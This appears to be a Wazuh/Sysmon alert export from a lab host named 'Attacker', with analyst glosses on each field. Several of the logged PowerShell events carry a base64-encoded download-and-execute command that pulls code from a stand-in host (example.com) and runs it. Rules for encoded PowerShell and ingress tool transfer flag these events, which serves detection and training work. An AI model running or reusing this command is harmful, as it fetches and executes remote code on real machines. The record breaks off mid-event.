ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00}
ProcessId: 11904
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd36-680a-530b-000000000e00}
ParentProcessId: 14008
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:45.366 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd39-680a-550b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11904 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd36-680a-530b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14008 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 62 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534269.1485404 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:47.0408204Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284083 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:46.996
ProcessGuid: {94294ddc-bd39-680a-550b-000000000e00}
ProcessId: 11904
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bkyc1qor.00t.ps1
CreationUtcTime: 2025-04-24 22:37:46.996
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:46.996 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd39-680a-550b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11904 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bkyc1qor.00t.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:46.996 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 59 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534272.1488173 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:50.1585075Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284107 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:48.495
ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00}
ProcessId: 10384
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd39-680a-550b-000000000e00}
ParentProcessId: 11904
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:48.495 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3c-680a-570b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd39-680a-550b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11904 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 63 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534272.1496244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:50.4145156Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284108 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:50.403
ProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00}
ProcessId: 10384
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_40uxjzck.fes.ps1
CreationUtcTime: 2025-04-24 22:37:50.403
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:50.403 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3c-680a-570b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_40uxjzck.fes.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:50.403 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 60 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534275.1499013 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:53.3104930Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284125 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:51.737
ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00}
ProcessId: 9020
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00}
ParentProcessId: 10384
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:51.737 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3f-680a-590b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
